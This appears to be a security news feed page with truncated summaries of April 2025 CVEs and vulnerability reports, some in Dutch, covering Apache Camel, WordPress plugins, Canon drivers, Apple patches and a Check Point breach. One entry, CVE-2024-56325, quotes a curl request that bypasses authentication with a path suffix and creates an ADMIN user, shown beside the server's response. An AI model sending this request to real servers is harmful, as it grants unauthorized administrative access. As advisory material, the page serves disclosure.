CVE-2025-30177 – Apache Camel Undertow: Camel Message Header Injection
The following table lists the changes that have been made to the CVE-2025-30177 vulnerability over time. Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability’s severity, exploitability, or other characteristics. New CVE Received by [email protected] Apr. 01, 2025 Action […]
CVE-2025-2237 – Homeo Theme for WordPress Authentication Bypass
CVE ID : CVE-2025-2237 Published : April 1, 2025, 12:15 p.m. | 1 hour, 9 minutes ago Description : The WP RealEstate plugin for WordPress, used by the Homeo theme, is vulnerable to authentication bypass in all versions up to, and including, 1.6.26. This is due to insufficient role restrictions in the ‘process_register’ function. This makes it […]
CVE-2024-13553 – WooCommerce WordPress Host Header Spoofing Privilege Escalation Vulnerability
CVE ID : CVE-2024-13553 Published : April 1, 2025, 12:15 p.m. | 1 hour, 9 minutes ago Description : The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.7.9. This is due to the plugin using the Host header to determine […]
Kritiek lek in Canon printer-drivers kan aanvaller code laten uitvoeren
Kritiek lek in Canon printer-drivers kan aanvaller code laten uitvoeren Een kritieke kwetsbaarheid in printer-drivers van Canon maakt het mogelijk voor een aanvaller om wilekeurige code op het systeem van gebruikers uit te voeren. De impact van de kwetsbaarheid is op een … Read more Published Date: Apr 01, 2025 (3 hours, 17 minutes ago) Vulnerabilities has […]
Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices
Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices Mobile Security / Vulnerability Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating s … Read more Published Date: Apr 01, 2025 (3 hours, 51 minutes […]
CVE-2025-3082 – MongoDB Server Collation Manipulation Vulnerability
The following table lists the changes that have been made to the CVE-2025-3082 vulnerability over time. Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability’s severity, exploitability, or other characteristics. New CVE Received by [email protected] Apr. 01, 2025 Action […]
Check Point Acknowledges Data Breach, Claims Information is ‘Old
Check Point Acknowledges Data Breach, Claims Information is ‘Old Check Point Software Technologies has confirmed a data breach following claims by threat actor CoreInjection on March 30th, 2025, but insists the incident is an “old, known and very pinpointed event” … Read more Published Date: Apr 01, 2025 (2 hours, 40 minutes ago) Vulnerabilities has been mentioned […]
Malafide audiobestand kan aanvaller code op iOS en macOS laten uitvoeren
Malafide audiobestand kan aanvaller code op iOS en macOS laten uitvoeren Een kwetsbaarheid in iOS en macOS maakt het mogelijk voor een aanvaller om door middel van een malafide audiobestand code op het systeem uit te voeren. Apple heeft updates uitgebracht om het probleem … Read more Published Date: Apr 01, 2025 (3 hours, 46 minutes ago) […]
CVE-2024-56325 – Authentication Bypass Issue If the path does not
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H “Content-Type: application/json” -d {“username”:”hack2″,”password”:”hack”,”component”:”CONTROLLER”,”role”:”ADMIN”,”tables”:[],”permissions”:[],”usernameWithComponent”:”hack_CONTROLLER”} http://{server_ip}:9000/users Return: {“code”:401,”error”:”HTTP 401 Unauthorized”} Malicious Request and Response Example curl -X POST -H “Content-Type: application/json” -d ‘{“username”:”hack”,”password”:”hack”,”component”:”CONTROLLER”,”role”:”ADMIN”,”tables”:[],”permissions”:[],”usernameWithComponent”:”hack_CONTROLLER”}’ http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {“users”:{}} A new […]
CVE-2025-27130 – Welcart e-Commerce 2.11.6 and earlier versions con
The following table lists the changes that have been made to the CVE-2025-27130 vulnerability over time. Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability’s severity, exploitability, or other characteristics. New CVE Received by [email protected] Apr. 01, 2025 Action […]